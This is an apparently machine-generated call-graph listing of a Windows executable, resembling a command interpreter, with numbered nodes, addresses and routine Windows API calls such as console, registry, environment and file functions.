18451 b1ea08 18480 b10a87 18451->18480 18673 b11e70 18451->18673 18454 b1ea58 _setjmp3 18456 b1ea82 18454->18456 18457 b1ea6f 18454->18457 18459 b1eaa4 18456->18459 18462 b063bd 448 API calls 18456->18462 18457->18456 18458 b1ea73 18457->18458 18461 b11e70 448 API calls 18458->18461 18468 b1ea3c 18458->18468 18679 b0dd98 _get_osfhandle GetFileType 18459->18679 18461->18458 18465 b1ea92 18462->18465 18463 b1ea52 18463->18454 18464 b1eab1 18466 b1eab5 _setmode 18464->18466 18467 b1eac6 18464->18467 18469 b24840 453 API calls 18465->18469 18466->18467 18684 b162c0 18467->18684 18472 b1ea9a 18469->18472 18472->18459 18473 b11e70 448 API calls 18472->18473 18473->18472 18474 b1eacc EnterCriticalSection LeaveCriticalSection 18477 b0c570 581 API calls 18474->18477 18476 b10ada exit 18476->18480 18482 b1eafa 18477->18482 18479 b11e70 448 API calls 18479->18480 18480->18463 18480->18476 18480->18479 18481 b1ea32 18480->18481 18584 b0e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18480->18584 18593 b0c570 18480->18593 18609 b0e470 18480->18609 18481->18468 18485 b11e70 448 API calls 18481->18485 18482->18474 18486 b1eb75 18482->18486 18487 b1eb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18482->18487 18483 b0e2af 4 API calls 18483->18480 18485->18481 18486->18468 18488 b11e70 448 API calls 18486->18488 18489 b0e2af 4 API calls 18487->18489 18488->18486 18490 b1eb40 18489->18490 18491 b0e470 918 API calls 18490->18491 18492 b0e310 12 API calls 18490->18492 18491->18490 18493 b1eb54 GetConsoleOutputCP GetCPInfo 18492->18493 18494 b0e2af 4 API calls 18493->18494 18494->18482 18496 b0e2ca 18495->18496 18497 b0e2bc SetThreadUILanguage 18495->18497 18498 b0e2d4 GetModuleHandleW 18496->18498 18499 b0e2ef 18496->18499 18497->18438 18498->18499 18501 b0e307 18498->18501 18499->18501 18502 b0e2f3 GetProcAddress 18499->18502 18501->18497 18503 b0e30b SetThreadLocale 18501->18503 18502->18501 18503->18438 18506 b11f91 18505->18506 18510 
b10a31 18505->18510 18507 b11fab VirtualQuery 18506->18507 18506->18510 18509 b11fbd 18507->18509 18507->18510 18508 b11fc7 VirtualQuery 18508->18509 18508->18510 18509->18508 18509->18510 18511 b11f1a GetConsoleOutputCP GetCPInfo 18510->18511 18512 b1f185 GetThreadLocale 18511->18512 18513 b11f39 memset 18511->18513 18515 b1f196 18512->18515 18514 b11f5a 18513->18514 18513->18515 18514->18446 18516 b1f20b 18515->18516 18517 b1f1ee memset 18515->18517 18516->18446 18517->18515 18519 b0e310 12 API calls 18518->18519 18520 b0884f 18519->18520 18715 b0a9d4 GetEnvironmentStringsW 18520->18715 18524 b0885e 18729 b08273 18524->18729 18527 b08873 18527->18527 18528 b08b2f 18527->18528 18751 b11a05 18527->18751 18530 b078e4 448 API calls 18528->18530 18532 b08b42 18530->18532 19050 b17d18 18532->19050 18533 b088a5 GetCommandLineW 18534 b088b8 18533->18534 18756 b0e3f0 18534->18756 18539 b088e1 18767 b08e9e 18539->18767 18585 b0e343 18584->18585 18586 b0e357 _get_osfhandle GetConsoleMode 18584->18586 18585->18586 18587 b0e3bc _get_osfhandle SetConsoleMode 18585->18587 18588 b0e372 18586->18588 18591 b0e3a0 GetConsoleOutputCP GetCPInfo 18586->18591 18587->18586 18590 b0e3df 18587->18590 18589 b0e381 _get_osfhandle SetConsoleMode 18588->18589 18588->18591 18589->18591 18590->18586 18592 b1dc1d _get_osfhandle SetConsoleMode 18590->18592 18591->18483 18592->18586 18594 b0c5d3 18593->18594 18595 b0c594 18593->18595 18597 b0c695 VirtualFree 18594->18597 18598 b0c5fe _setjmp3 18594->18598 18595->18594 18596 b0c59e GetProcessHeap RtlFreeHeap 18595->18596 18596->18594 18596->18595 18597->18594 18600 b0c666 18597->18600 18599 b0c63c 18598->18599 18605 b0c683 18598->18605 20233 b0a8c4 18599->20233 18602 b0c66f 18600->18602 20253 b28959 18600->20253 18602->18605 20262 b28791 18602->20262 18603 b0c64d 18603->18602 20244 b0cc70 18603->20244 18605->18480 18607 b1d0f0 18607->18607 18610 b0e48a 18609->18610 18611 b0e517 18609->18611 18610->18611 18612 b0e4cc 18610->18612 18613 b0e4ae memset 
18610->18613 18611->18480 18615 b0e5ad 18612->18615 18616 b0e501 18612->18616 18621 b0e4d9 18612->18621 20933 b0e670 18613->20933 18619 b0dcd0 448 API calls 18615->18619 18616->18611 18629 b0e670 457 API calls 18616->18629 18617 b0e572 20966 b09ef2 memset 18617->20966 18618 b0e4e9 18623 b0e531 18618->18623 18624 b0e4ef 18618->18624 18620 b0e5b7 18619->18620 18620->18616 18630 b0e627 18620->18630 21071 b0ed90 18620->21071 18621->18617 18621->18618 18626 b0e544 18623->18626 18627 b0e55f 18623->18627 20860 b0ad60 GetConsoleTitleW 18624->20860 18632 b0e588 18626->18632 18633 b0e54c 18626->18633 20961 b0ab50 18627->20961 18629->18611 21105 b157ea 18630->21105 18631 b0e583 18631->18616 21016 b10390 18632->21016 18638 b0e592 18633->18638 18639 b0e554 18633->18639 18643 b0e4f6 18638->18643 21019 b10740 18638->21019 20948 b103b0 18639->20948 18641 b0e631 18641->18616 18648 b0dcd0 448 API calls 18641->18648 18643->18616 18644 b0a125 2 API calls 18643->18644 18644->18616 18645 b0e5dd 18647 b0f410 464 API calls 18645->18647 18649 b0e5eb 18647->18649 18650 b0e641 18648->18650 18649->18630 18651 b0e5f0 18649->18651 18650->18616 18652 b0e64b 18650->18652 18653 b09ef2 459 API calls 18651->18653 18654 b0ec2e 448 API calls 18652->18654 18655 b0e5f9 18653->18655 18654->18651 18655->18616 21075 b12081 18655->21075 18659 b0790c 448 API calls 18658->18659 18660 b063dc 18659->18660 18661 b24840 GetStdHandle 18660->18661 18662 b063bd 448 API calls 18661->18662 18663 b2485e 18662->18663 18664 b248c5 18663->18664 18666 b0dd98 6 API calls 18663->18666 18665 b09950 448 API calls 18664->18665 18667 b248cf 18665->18667 18668 b2486b 18666->18668 18667->18451 18669 b248b5 18668->18669 18670 b24878 FlushConsoleInputBuffer _getch 18668->18670 18671 b24799 448 API calls 18669->18671 18670->18664 18672 b24891 EnterCriticalSection LeaveCriticalSection 18670->18672 18671->18664 18672->18664 22556 b11ea6 18673->22556 18675 b11e7c 18676 b11e82 18675->18676 18677 b08bc7 446 API calls 18675->18677 
18676->18451 18678 b11e92 GetProcessHeap RtlFreeHeap 18677->18678 18678->18676 18682 b0ddca 18679->18682 18683 b0ddbd 18679->18683 18680 b0ddd6 GetStdHandle 18681 b0ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18680->18681 18681->18683 18682->18680 18682->18681 18683->18464 22564 b1643a NtOpenThreadToken 18684->22564 18687 b21ef3 RtlNtStatusToDosError SetLastError 18689 b21f01 18687->18689 18688 b16302 18688->18689 18690 b21f51 18688->18690 18691 b16319 18688->18691 18692 b0ab7f 2 API calls 18689->18692 18706 b21fdc 18689->18706 18694 b21f59 GetConsoleTitleW 18690->18694 22573 b1640a FormatMessageW 18691->22573 18714 b16395 18692->18714 18695 b21f79 wcsstr 18694->18695 18713 b163c1 18694->18713 18697 b21f92 18695->18697 18695->18713 18696 b163d8 18702 b163e2 LocalFree 18696->18702 18703 b163e9 18696->18703 18698 b21fa0 wcsstr 18697->18698 18698->18698 18698->18713 18699 b16332 18699->18696 18699->18699 18707 b21f3d 18699->18707 18710 b0dcd0 448 API calls 18699->18710 18700 b0dc60 2 API calls 18700->18696 18701 b078e4 448 API calls 18704 b21f4a 18701->18704 18702->18703 18705 b163f1 18703->18705 18703->18707 18704->18474 18708 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18705->18708 18707->18701 18711 b16400 18708->18711 18709 b163b4 SetConsoleTitleW 18709->18713 18712 b16369 18710->18712 18711->18474 18712->18694 18712->18696 18712->18714 18713->18696 18713->18700 18713->18706 18714->18707 18714->18709 18714->18713 18716 b0a9e6 18715->18716 18717 b08854 18715->18717 18718 b0a9ee GetProcessHeap RtlAllocateHeap 18716->18718 18721 b08b96 GetProcessHeap HeapAlloc 18717->18721 18719 b0aa11 FreeEnvironmentStringsW 18718->18719 18720 b0aa06 memcpy 18718->18720 18719->18717 18720->18719 18722 b08bb4 18721->18722 18728 b1b5ce 18721->18728 18723 b0a9d4 5 API calls 18722->18723 18724 b08bb9 18723->18724 18725 b1b5b2 GetProcessHeap RtlFreeHeap 18724->18725 18726 b08bc3 18724->18726 18727 b078e4 448 API calls 18725->18727 
18726->18524 18727->18728 18728->18524 18747 b08282 18729->18747 18730 b082bd RegOpenKeyExW 18731 b082e1 RegQueryValueExW 18730->18731 18730->18747 18733 b08321 RegQueryValueExW 18731->18733 18731->18747 18732 b08552 time srand 18734 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18732->18734 18735 b08371 RegQueryValueExW 18733->18735 18733->18747 18736 b08570 GetCommandLineW 18734->18736 18738 b083ab RegQueryValueExW 18735->18738 18735->18747 18736->18527 18737 b1b11a _wtol 18737->18733 18740 b083fb RegQueryValueExW 18738->18740 18738->18747 18739 b1b146 _wtol 18739->18735 18741 b0846c RegQueryValueExW 18740->18741 18740->18747 18741->18747 18742 b1b18e _wtol 18742->18738 18743 b1b1ba wcstol 18743->18747 18744 b1b1dc wcstol 18744->18747 18745 b1b218 wcstol 18745->18747 18746 b084fa RegQueryValueExW 18746->18747 18748 b08534 RegCloseKey 18746->18748 18747->18730 18747->18732 18747->18733 18747->18735 18747->18737 18747->18738 18747->18739 18747->18740 18747->18741 18747->18742 18747->18743 18747->18744 18747->18745 18747->18746 18747->18748 18749 b1b28c ExpandEnvironmentStringsW 18747->18749 19054 b0acb0 18747->19054 18748->18747 18749->18747 19064 b16e25 18751->19064 18753 b11a27 18754 b0889a 18753->18754 18755 b11a2f memset 18753->18755 18754->18528 18754->18533 18755->18754 18757 b0e405 18756->18757 18758 b088d9 18756->18758 18759 b16e25 4 API calls 18757->18759 18758->18528 18758->18539 18760 b0e422 18759->18760 18761 b1dc4a 18760->18761 18762 b0e42d 18760->18762 19076 b234d4 18761->19076 18763 b0e441 memset 18762->18763 18764 b1dc6b ??_V@YAXPAX 18762->18764 18763->18758 18768 b08ec1 GetCurrentDirectoryW 18767->18768 18769 b08ede towupper 18767->18769 18774 b08ec9 18768->18774 19146 b0ec2e GetEnvironmentVariableW 18769->19146 18771 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18773 b088fc 18771->18773 18776 b100e9 memset 18773->18776 18774->18771 18775 b1b787 towupper 18777 b0e3f0 17 API calls 
18776->18777 18778 b1013e 18777->18778 18779 b1e615 18778->18779 18780 b10146 18778->18780 18783 b11e70 448 API calls 18779->18783 18786 b1e61f exit 18779->18786 18781 b10151 GetModuleFileNameW 18780->18781 18782 b1e627 18780->18782 18784 b0ec2e 448 API calls 18781->18784 19288 b0a976 18782->19288 18783->18779 18785 b10168 18784->18785 18785->18782 18788 b10170 18785->18788 18786->18782 18790 b0ec2e 448 API calls 18788->18790 18789 b1e63e 18793 b0a976 8 API calls 18789->18793 18791 b1017c 18790->18791 18791->18789 18792 b10184 18791->18792 18794 b0ec2e 448 API calls 18792->18794 18795 b1e64f 18793->18795 18796 b10190 18794->18796 18798 b0a976 8 API calls 18795->18798 18796->18795 18797 b10198 18796->18797 18800 b1e660 18798->18800 19051 b17d1d 19050->19051 19052 b11e70 448 API calls 19051->19052 19053 b17d28 exit 19051->19053 19052->19051 19055 b0acc0 19054->19055 19055->19055 19058 b0dcd0 19055->19058 19057 b0acd8 19057->18747 19059 b1d9da 19058->19059 19060 b0dcde GetProcessHeap HeapAlloc 19058->19060 19062 b078e4 446 API calls 19059->19062 19060->19059 19061 b0dcf6 19060->19061 19061->19057 19063 b1d9e3 19062->19063 19063->19057 19065 b16e30 __EH_prolog3_catch 19064->19065 19068 b1742d 19065->19068 19067 b16e48 19067->18753 19069 b17441 malloc 19068->19069 19070 b17434 _callnewh 19069->19070 19071 b1744f 19069->19071 19070->19069 19072 b17451 19070->19072 19071->19067 19075 b174d1 ??0exception@@QAE@ABQBDH 19072->19075 19074 b177ec _CxxThrowException 19075->19074 19079 b2345e 19076->19079 19082 b232e4 19079->19082 19083 b232f6 19082->19083 19090 b22e74 19083->19090 19087 b233a9 19088 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19087->19088 19089 b233ba 19088->19089 19089->18758 19091 b22ea3 19090->19091 19092 b22ead 19090->19092 19091->19092 19093 b2345e 9 API calls 19091->19093 19094 b22f1d GetCurrentThreadId 19092->19094 19093->19092 19095 b22f6c 19094->19095 19096 b23061 19095->19096 19106 b22e37 19095->19106 19099 b22fe7 
19099->19087 19102 b2392b 19099->19102 19100 b23036 OutputDebugStringW 19100->19099 19103 b23941 19102->19103 19104 b2394c memset 19102->19104 19103->19104 19105 b2397a 19104->19105 19107 b22e42 19106->19107 19108 b22e4e 19106->19108 19107->19108 19109 b22e5d IsDebuggerPresent 19107->19109 19108->19099 19108->19100 19110 b22859 19108->19110 19109->19108 19114 b22885 19110->19114 19120 b22a23 19110->19120 19111 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19112 b22a60 19111->19112 19112->19100 19113 b2290d FormatMessageW 19115 b22963 19113->19115 19116 b2294c 19113->19116 19114->19113 19114->19120 19118 b23067 _vsnwprintf 19115->19118 19139 b23067 19116->19139 19119 b2295e 19118->19119 19120->19111 19142 b09a8d 19139->19142 19143 b09a98 19142->19143 19147 b0ec64 19146->19147 19149 b08f0d 19146->19149 19148 b0ec71 _wcsicmp 19147->19148 19147->19149 19150 b0ed59 19148->19150 19151 b0ec87 _wcsicmp 19148->19151 19149->18774 19149->18775 19154 b08e9e 436 API calls 19150->19154 19152 b0ed47 19151->19152 19153 b0ec9d _wcsicmp 19151->19153 19195 b09abf 19152->19195 19153->19152 19155 b0ecb3 _wcsicmp 19153->19155 19156 b0ed6c 19154->19156 19157 b0ecc9 _wcsicmp 19155->19157 19158 b1ddef GetCommandLineW 19155->19158 19199 b06854 19156->19199 19157->19156 19160 b0ecdf _wcsicmp 19157->19160 19158->19149 19161 b0ecf1 _wcsicmp 19160->19161 19162 b0ed24 19160->19162 19164 b0ed07 _wcsicmp 19161->19164 19165 b1ddfa rand 19161->19165 19171 b09310 19162->19171 19164->19149 19167 b1de06 GetNumaHighestNodeNumber 19164->19167 19165->19152 19167->19152 19168 b0ed30 19168->19149 19238 b16c78 19168->19238 19172 b0933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19171->19172 19173 b093fe 19171->19173 19174 b1bbd9 19172->19174 19175 b0938d 19172->19175 19173->19168 19241 b248d7 19173->19241 19190 b1bbd1 19174->19190 19247 b08791 GetUserDefaultLCID 19174->19247 19177 b1bbcc 19175->19177 19178 b093cd 19175->19178 19182 b09950 
441 API calls 19177->19182 19181 b09abf _vsnwprintf 19178->19181 19184 b093d6 19181->19184 19182->19190 19187 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19184->19187 19185 b09abf _vsnwprintf 19185->19190 19186 b1bd10 19187->19173 19190->19185 19190->19190 19192 b1bdbf 19190->19192 19249 b0998d 19190->19249 19192->19192 19193 b1bc11 19193->19186 19194 b1bcd0 memmove 19193->19194 19194->19193 19196 b09acd 19195->19196 19197 b09aee 19196->19197 19285 b09afb _vsnwprintf 19196->19285 19197->19150 19200 b06b0c 19199->19200 19201 b0688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19199->19201 19202 b248d7 6 API calls 19200->19202 19203 b068ec 19201->19203 19211 b1a562 19201->19211 19204 b1a4c2 19202->19204 19205 b08791 GetUserDefaultLCID 19203->19205 19204->19168 19206 b06906 GetLocaleInfoW 19205->19206 19224 b06915 19206->19224 19207 b06966 19210 b08791 GetUserDefaultLCID 19207->19210 19208 b1a5f9 19212 b09abf _vsnwprintf 19208->19212 19209 b1a5df realloc 19209->19208 19209->19211 19213 b0698e GetDateFormatW 19210->19213 19211->19208 19211->19209 19217 b078e4 434 API calls 19211->19217 19214 b1a62a 19212->19214 19215 b06a96 19213->19215 19216 b0699d 19213->19216 19220 b1a63e 19214->19220 19229 b1a64d 19214->19229 19218 b08791 GetUserDefaultLCID 19215->19218 19216->19215 19223 b069ab 19216->19223 19217->19211 19225 b09950 434 API calls 19220->19225 19223->19214 19224->19207 19228 b1a523 memmove 19224->19228 19230 b06a75 memmove 19224->19230 19234 b1a649 19225->19234 19228->19224 19233 b09950 434 API calls 19229->19233 19230->19224 19233->19234 19287 b16b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19238->19287 19240 b0ed88 19240->19158 19242 b248f0 GetSystemTime 19241->19242 19243 b248fc 19241->19243 19244 b2493b SystemTimeToFileTime 19242->19244 19243->19244 19245 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19244->19245 
19246 b1bbc7 19245->19246 19246->19168 19248 b087a5 GetLocaleInfoW 19247->19248 19248->19193 19250 b099a0 19249->19250 19272 b099d0 19249->19272 19251 b09a11 6 API calls 19250->19251 19272->19190 19286 b09b1f 19285->19286 19286->19197 19287->19240 19289 b0a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19288->19289 19290 b0a986 19288->19290 19291 b0a9d4 5 API calls 19289->19291 19290->19289 19292 b0a9c5 19291->19292 19292->18789 20234 b0a8e6 20233->20234 20235 b0cc70 549 API calls 20234->20235 20236 b0a8f8 20235->20236 20237 b180ba longjmp 20236->20237 20238 b0a90c 20236->20238 20240 b180c8 20237->20240 20279 b0bab0 20238->20279 20292 b0d660 EnterCriticalSection LeaveCriticalSection 20240->20292 20241 b0a911 20241->18603 20243 b180cd 20243->18603 20245 b0cc7a 20244->20245 20246 b0cf10 548 API calls 20245->20246 20247 b0cc8a 20246->20247 20248 b1d434 longjmp 20247->20248 20249 b0cc9b 20247->20249 20248->20249 20250 b09950 448 API calls 20249->20250 20251 b0ccc4 20249->20251 20252 b1d45b 20250->20252 20251->18600 20254 b28996 20253->20254 20261 b2898e 20253->20261 20255 b289b2 20254->20255 20256 b289a2 20254->20256 20260 b078e4 448 API calls 20255->20260 20255->20261 20257 b078e4 448 API calls 20256->20257 20257->20261 20258 b289db 20258->18602 20259 b289ce longjmp 20259->20258 20260->20261 20261->20258 20261->20259 20277 b287a0 20262->20277 20263 b2892e 20263->18607 20264 b28900 20266 b09950 448 API calls 20264->20266 20265 b28930 20269 b09950 448 API calls 20265->20269 20268 b2890f 20266->20268 20271 b28925 20268->20271 20274 b09950 448 API calls 20268->20274 20269->20263 20270 b288be 20270->20264 20272 b288c3 20270->20272 20844 b2871d 20271->20844 20272->20265 20276 b288d2 20272->20276 20273 b09950 448 API calls 20273->20277 20274->20271 20851 b286e6 20276->20851 20277->20263 20277->20264 20277->20265 20277->20270 20277->20273 20277->20276 20278 b28791 448 API calls 20277->20278 20278->20277 20288 b0bb19 20279->20288 20291 b0bac2 20279->20291 20280 b0baf3 
20284 b0bb56 20280->20284 20377 b0ccd0 20280->20377 20281 b0badc _wcsicmp 20281->20280 20283 b0bb68 20281->20283 20283->20280 20286 b0cc70 549 API calls 20283->20286 20284->20241 20285 b0bb15 20285->20241 20286->20283 20287 b0cc70 549 API calls 20287->20288 20288->20287 20289 b0bb48 20288->20289 20288->20291 20289->20284 20290 b0cc70 549 API calls 20289->20290 20290->20291 20291->20280 20291->20281 20293 b0d6b0 20292->20293 20294 b1d587 20293->20294 20296 b0d6c6 EnterCriticalSection LeaveCriticalSection 20293->20296 20301 b0d971 20293->20301 20295 b1d59b 20294->20295 20297 b063bd 448 API calls 20294->20297 20687 b2769e 20295->20687 20299 b0d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20296->20299 20300 b1d5a8 20296->20300 20297->20295 20304 b0d752 20299->20304 20720 b29fcf _get_osfhandle GetFileType 20300->20720 20301->20301 20665 b0da30 20301->20665 20305 b0d81c 20304->20305 20309 b1d742 memcmp 20304->20309 20316 b0d774 20304->20316 20311 b0d9f7 GetLastError 20305->20311 20321 b0d82c 20305->20321 20306 b1d5be 20308 b1d6bd 20306->20308 20312 b0dd98 6 API calls 20306->20312 20307 b0d980 20307->20243 20308->20304 20310 b1d6c6 _get_osfhandle 20308->20310 20318 b1d6ef GetLastError 20308->20318 20308->20321 20309->20316 20314 b245f9 10 API calls 20310->20314 20311->20321 20313 b1d5cd 20312->20313 20313->20308 20315 b1d5de 20313->20315 20314->20308 20315->20299 20320 b0dd98 6 API calls 20315->20320 20317 b1d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20316->20317 20319 b0d7b2 20316->20319 20322 b0d7bd SetFilePointer 20316->20322 20317->20319 20327 b0d809 20317->20327 20318->20304 20318->20308 20324 b1d7e9 20319->20324 20325 b0d7ec MultiByteToWideChar 20319->20325 20319->20327 20326 b1d5f2 20320->20326 20331 b0dd98 6 API calls 20321->20331 20347 b0d840 20321->20347 20322->20319 20328 b1d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20324->20328 20325->20327 20329 b1d6b3 20326->20329 20332 b1d607 20326->20332 
20327->20305 20327->20328 20328->20321 20329->20299 20330 b0d893 20330->20243 20333 b1d826 20331->20333 20334 b1d610 20332->20334 20335 b1d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20332->20335 20338 b29922 448 API calls 20333->20338 20333->20347 20721 b27613 _get_osfhandle 20334->20721 20337 b24191 448 API calls 20335->20337 20339 b1d665 20337->20339 20340 b1d84f longjmp 20338->20340 20339->20311 20341 b1d66d 20339->20341 20340->20347 20341->20321 20344 b1d677 GetLastError 20341->20344 20342 b0d8d7 wcschr 20343 b0d8f6 20342->20343 20342->20347 20351 b0d9e3 20343->20351 20353 b0d904 20343->20353 20345 b1d689 20344->20345 20346 b1d69e 20344->20346 20348 b09950 448 API calls 20345->20348 20349 b09950 448 API calls 20346->20349 20347->20330 20347->20342 20347->20343 20352 b1d68e longjmp 20348->20352 20349->20321 20350 b1d908 20350->20243 20351->20301 20357 b0d9eb 20351->20357 20352->20346 20353->20350 20355 b0dd98 6 API calls 20353->20355 20354 b1d8d3 20356 b078e4 448 API calls 20354->20356 20358 b0d945 20355->20358 20359 b1d8df 20356->20359 20357->20354 20360 b2769e 459 API calls 20357->20360 20375 b1d8af 20357->20375 20358->20301 20362 b0d949 _get_osfhandle SetFilePointer 20358->20362 20363 b1d8fb longjmp 20359->20363 20366 b0dd98 6 API calls 20359->20366 20364 b1d898 20360->20364 20361 b078e4 448 API calls 20365 b1d8be 20361->20365 20362->20301 20373 b1d915 20362->20373 20363->20350 20367 b09950 448 API calls 20364->20367 20368 b29922 448 API calls 20365->20368 20369 b1d8f2 20366->20369 20370 b1d8a2 20367->20370 20371 b1d8c6 longjmp 20368->20371 20369->20363 20726 b2a0da 20369->20726 20372 b09950 448 API calls 20370->20372 20371->20354 20372->20375 20373->20301 20376 b0998d 448 API calls 20373->20376 20375->20361 20376->20301 20378 b0cd14 20377->20378 20379 b0cce9 20377->20379 20420 b0de30 20378->20420 20380 b0ccf5 20379->20380 20381 b0cde8 20379->20381 20384 b0cd01 20380->20384 20385 b0cdf2 20380->20385 20491 b0e090 20381->20491 20387 b0cd12 
20384->20387 20417 b0e230 20384->20417 20494 b0e210 20385->20494 20388 b0cddd 20387->20388 20436 b0cf10 _setjmp3 20387->20436 20388->20285 20391 b0cd48 20392 b1d478 longjmp 20391->20392 20393 b0cd59 20391->20393 20394 b1d48f 20392->20394 20393->20394 20399 b0cd85 20393->20399 20395 b09950 448 API calls 20394->20395 20396 b1d49f 20395->20396 20397 b29922 448 API calls 20396->20397 20398 b1d4ac longjmp 20397->20398 20402 b1d4ba 20398->20402 20400 b0ce4a 20399->20400 20403 b0cdd2 20399->20403 20401 b0ce6c 20400->20401 20404 b0cc70 549 API calls 20400->20404 20409 b0ce61 20400->20409 20401->20388 20407 b0dcd0 448 API calls 20401->20407 20405 b09950 448 API calls 20402->20405 20406 b0cf10 548 API calls 20403->20406 20404->20400 20408 b1d4ca 20405->20408 20406->20388 20410 b0ce89 20407->20410 20408->20285 20411 b0cf10 548 API calls 20409->20411 20410->20396 20412 b0ce93 20410->20412 20411->20401 20413 b0cc70 549 API calls 20412->20413 20414 b0ceac 20413->20414 20415 b0bab0 575 API calls 20414->20415 20416 b0cec6 20414->20416 20415->20416 20416->20285 20418 b0ccd0 577 API calls 20417->20418 20419 b0e247 20418->20419 20419->20387 20497 b0ded0 20420->20497 20422 b0de4a 20423 b0de52 20422->20423 20424 b1da16 20422->20424 20515 b0e0b0 20423->20515 20425 b0cc70 549 API calls 20424->20425 20429 b0de57 20425->20429 20427 b0de64 20428 b0cc70 549 API calls 20427->20428 20435 b0de92 20427->20435 20430 b0de75 20428->20430 20429->20427 20432 b28959 449 API calls 20429->20432 20431 b0ded0 555 API calls 20430->20431 20433 b0de80 20431->20433 20432->20427 20434 b0cf10 548 API calls 20433->20434 20433->20435 20434->20435 20435->20387 20437 b1d56e 20436->20437 20441 b0cf38 20436->20441 20438 b0d03b 20439 b0d048 20438->20439 20442 b09950 448 API calls 20438->20442 20439->20391 20440 b0cf9e 20445 b0d600 533 API calls 20440->20445 20441->20437 20441->20438 20441->20440 20449 b0cf86 wcschr 20441->20449 20479 b0d0fa 20441->20479 20660 b0d600 20441->20660 20444 b1d4ca 20442->20444 20444->20391 
20447 b0cfb7 20445->20447 20446 b0cf67 iswspace 20446->20441 20448 b1d4d2 20447->20448 20453 b0cfc7 20447->20453 20450 b0d600 533 API calls 20448->20450 20448->20479 20449->20440 20449->20441 20451 b1d4ea 20450->20451 20461 b0d600 533 API calls 20451->20461 20452 b0cfe2 iswdigit 20454 b0cfff 20452->20454 20480 b0d341 20452->20480 20453->20452 20455 b0d0a6 20453->20455 20458 b0d4a7 20453->20458 20453->20479 20462 b0d600 533 API calls 20454->20462 20470 b0d027 20454->20470 20464 b0d0b5 iswspace 20455->20464 20465 b0d0e8 iswdigit 20455->20465 20455->20480 20456 b0d218 20456->20391 20457 b0d190 20457->20456 20460 b078e4 448 API calls 20457->20460 20463 b0d600 533 API calls 20458->20463 20459 b0d600 533 API calls 20459->20480 20460->20437 20461->20480 20466 b0d2a5 20462->20466 20467 b0d4ac 20463->20467 20464->20452 20468 b0d0c7 20464->20468 20469 b0d310 20465->20469 20465->20479 20475 b0d600 533 API calls 20466->20475 20481 b0d2ae 20466->20481 20467->20438 20467->20451 20467->20452 20467->20479 20472 b0d0d0 wcschr 20468->20472 20468->20479 20471 b0d328 iswspace 20469->20471 20469->20480 20470->20391 20476 b0d484 20471->20476 20471->20480 20472->20452 20472->20465 20473 b0d1b4 iswspace 20473->20457 20473->20479 20474 b0d16d iswdigit 20474->20479 20475->20481 20478 b0a62f wcschr 20476->20478 20477 b0d600 533 API calls 20477->20479 20478->20480 20479->20454 20479->20457 20479->20473 20479->20474 20479->20477 20482 b0d23e iswspace 20479->20482 20483 b0d1d1 wcschr 20479->20483 20480->20452 20480->20459 20480->20479 20481->20470 20484 b0d600 533 API calls 20481->20484 20487 b0a62f wcschr 20481->20487 20488 b0d426 iswdigit 20481->20488 20482->20479 20485 b0d253 wcschr 20482->20485 20483->20457 20483->20474 20486 b0d405 iswspace 20484->20486 20485->20479 20486->20481 20487->20481 20488->20470 20489 b0d438 20488->20489 20490 b0d600 533 API calls 20489->20490 20490->20470 20492 b0ccd0 577 API calls 20491->20492 20493 b0e0a7 20492->20493 20493->20387 20495 b0ccd0 577 API calls 
20494->20495 20496 b0e227 20495->20496 20496->20387 20504 b0df00 20497->20504 20498 b0df16 iswdigit 20500 b0df27 20498->20500 20498->20504 20499 b0dcd0 448 API calls 20499->20504 20501 b0df2f 20500->20501 20505 b0cf10 548 API calls 20500->20505 20501->20422 20502 b0df63 iswdigit 20502->20504 20503 b1daf9 longjmp 20507 b0e26b 20503->20507 20504->20498 20504->20499 20504->20500 20504->20502 20504->20503 20506 b1daec 20504->20506 20511 b0e059 iswdigit 20504->20511 20512 b28959 449 API calls 20504->20512 20513 b0acb0 448 API calls 20504->20513 20514 b0cc70 549 API calls 20504->20514 20587 b0a931 20504->20587 20505->20501 20508 b28959 449 API calls 20506->20508 20507->20422 20509 b1daf1 20508->20509 20509->20503 20511->20504 20512->20504 20513->20504 20514->20504 20516 b0e0c1 _wcsicmp 20515->20516 20517 b0e15b 20515->20517 20518 b0e203 _wcsicmp 20516->20518 20519 b0e0dc _wcsicmp 20516->20519 20521 b0dcd0 448 API calls 20517->20521 20522 b0e1db 20517->20522 20525 b12a35 20518->20525 20570 b12a63 20518->20570 20519->20518 20523 b0e0f7 _wcsicmp 20519->20523 20526 b0e17d 20521->20526 20527 b28959 449 API calls 20522->20527 20545 b0e1e0 20522->20545 20523->20517 20524 b0e112 _wcsicmp 20523->20524 20524->20517 20528 b0e12d _wcsicmp 20524->20528 20604 b0bb90 20525->20604 20530 b19ca7 20526->20530 20543 b0e187 20526->20543 20531 b0e1f5 20527->20531 20528->20517 20532 b0e144 _wcsicmp 20528->20532 20535 b29922 448 API calls 20530->20535 20531->20429 20532->20517 20533 b12a47 20538 b0cc70 549 API calls 20533->20538 20533->20570 20534 b0e1bf 20537 b0a8c4 563 API calls 20534->20537 